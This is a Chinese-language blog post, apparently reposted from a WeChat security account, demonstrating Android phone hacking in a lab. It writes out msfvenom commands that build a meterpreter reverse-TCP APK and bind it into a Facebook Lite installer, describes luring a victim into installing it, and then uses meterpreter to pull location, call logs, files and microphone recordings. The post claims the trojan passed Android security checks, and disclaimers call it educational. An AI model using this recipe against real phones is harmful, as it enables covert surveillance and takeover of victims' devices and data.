了解手机黑客

admin
admin
admin
138635
文章
114
评论
2024年5月5日17:50:16评论42 views字数 2114阅读7分2秒阅读模式

了解手机黑客

免责声明!

本文关于“手机黑客”仅用于教育目的。我不赞同或鼓励任何非法活动。所有演示都是在受控环境中模拟的。请勿尝试未经授权访问移动设备。负责任地使用此信息并自行承担风险。

在数字时代,移动电话已成为我们日常生活中不可或缺的一部分,充当个人助理、通信设备和互联网网关。然而,它们提供的便利也伴随着安全漏洞的风险。

什么是手机黑客?这是指未经授权的访问、操纵或利用移动设备及其数据。手机黑客攻击的各个方面,包括黑客使用的方法,包括但不限于恶意软件、网络钓鱼、网络攻击和社会工程。

  • 恶意软件:旨在渗透、破坏或未经授权访问计算机系统(包括移动设备)的恶意软件。示例包括病毒、蠕虫、特洛伊木马和间谍软件。

  • 网络钓鱼:一种网络攻击方法,通过在电子通信中伪装成值得信赖的实体,诱骗个人泄露敏感信息,例如用户名、密码或财务数据。

  • 中间人 (MitM) 攻击:一种网络攻击,攻击者在不知情的情况下拦截并可能改变两方之间的通信。这可以在网络环境中执行,包括 Wi-Fi 连接。

  • 社会工程:通常通过心理操纵而不是技术手段操纵个人泄露机密信息或执行危害安全的行为。

在本次实际演示中,我们利用了针对Android设备的恶意软件和网络钓鱼技术的有效组合。然后,我们将使用msfvenom制作一个恶意应用程序,并有策略地诱使受害者下载并安装它。这种欺骗性的策略使我们能够完全访问和控制他们的手机,这表明成为此类网络威胁受害者的严重后果。

实验室设置

首先,我们必须在 kali Linux 上建立我们的移动黑客实验室。

为了对 Android 设备和应用程序进行评估,我们需要真实的或模拟的 Android 设备。

在本次实践中,我们使用了真实设备,这里会来安装Genymotion一个 Android 模拟器,它具有一整套传感器和功能,以便与虚拟 Android 环境进行交互。

为了正确下载这个应用程序并将其安装在我们的kali linux上,我们访问了Genymotion官方网站下载页面

了解手机黑客

要安装,我们导航到下载文件的目录并运行以下命令。

了解手机黑客

执行并记下系统上的此目录。

了解手机黑客

我们还安装 virtualbox 和 adb

了解手机黑客

要运行 genymotion,我们导航到上面突出显示的目录。

了解手机黑客

并运行,应用程序应该弹出。

了解手机黑客

我们通过单击此处创建了一个帐户。

了解手机黑客

我们被重定向到此页面。

了解手机黑客

接下来我们登录选择这个选项

了解手机黑客

终于启动并运行了

了解手机黑客

现在让我们添加一个设备

了解手机黑客

了解手机黑客

全部点击下一步

了解手机黑客

安装

了解手机黑客

了解手机黑客

我们的虚拟电话已启动并正在运行。

了解手机黑客

我们现在需要做的就是使用msfvenom生成恶意应用程序并将其发送给受害者。

生成我们的有效负载

msfvenom是 Metasploit 框架中的一个强大工具,Metasploit 框架是一个广泛使用的渗透测试和利用工具包。msfvenom允许安全专业人员和道德黑客为各种攻击生成自定义有效负载。这些有效负载可以针对各种平台和目的而设计,包括远程代码执行、shell 访问等。

该工具允许用户指定有效负载类型、编码技术、输出格式和其他参数,从而提供了制作有效负载的灵活性。

我们使用以下命令使用msfvenom创建恶意APK

sudo msfvenom -platform android -a java -p android/meterpreter/reverse_tcp LHOST=<攻击者IP> LPORT=<端口> -f raw -omale.apk

获取我们的攻击者IP

了解手机黑客

将我们的有效负载与 Facebook Lite 绑定

我在这里从 apkpure 下载了 Facebook Lite APK

了解手机黑客

了解手机黑客

我们使用以下命令将APK绑定到payload

sudo msfvenom --platform android -a java -p android/meterpreter/reverse_tcp -x Facebook_Lite_401.0.0.14.110_Apkpure.apk LHOST=Atacker_IP LPORT=端口 -omaleFB.apk

了解手机黑客

服务和下载 发送应用程序

我们可以使用各种方法将应用程序发送给受害者,这里我们使用一个简单的 python http 服务器来为应用程序提供服务。

了解手机黑客

通过受害者浏览器下载恶意应用程序。

了解手机黑客

截至 2024 年 4 月 4 日,我们的恶意应用程序通过了所有 Android 安全检查。

了解手机黑客

获取受害者的电话

为此,我们将使用 msfconsole 来设置反向 shell 处理程序和必要的参数。

了解手机黑客

了解手机黑客

现在我们通过单击 MainActivity apk 在 Android 手机上启动该应用程序。

了解手机黑客

我们在受害者的手机上安装了 meterpreter shell!

获取有关远程系统的信息,例如我们运行的操作系统;

了解手机黑客

获取我们运行时服务器正在运行的用户;获取用户ID

了解手机黑客

我们使用help命令来查看可以在目标上运行的所有可能的命令。

了解手机黑客

了解手机黑客

要检查设备是否已取得 root 权限或越狱,我们运行check_root。

我们还使用geolocate命令来查看设备的当前位置

了解手机黑客

我们使用dump_calllog命令检索受害者的所有通话记录

了解手机黑客

了解手机黑客

我们还可以通过运行webcam_list查看设备有多少个网络摄像头

了解手机黑客

我们还使用 record_mic 命令来窃听用户。

了解手机黑客

了解手机黑客

文件系统访问

我们有完整的文件系统,我们可以上传文件、下载文件和读取文件内容,如下所示;

了解手机黑客


原文始发于微信公众号(KK安全说):了解手机黑客

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月5日17:50:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   了解手机黑客https://cn-sec.com/archives/2710175.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息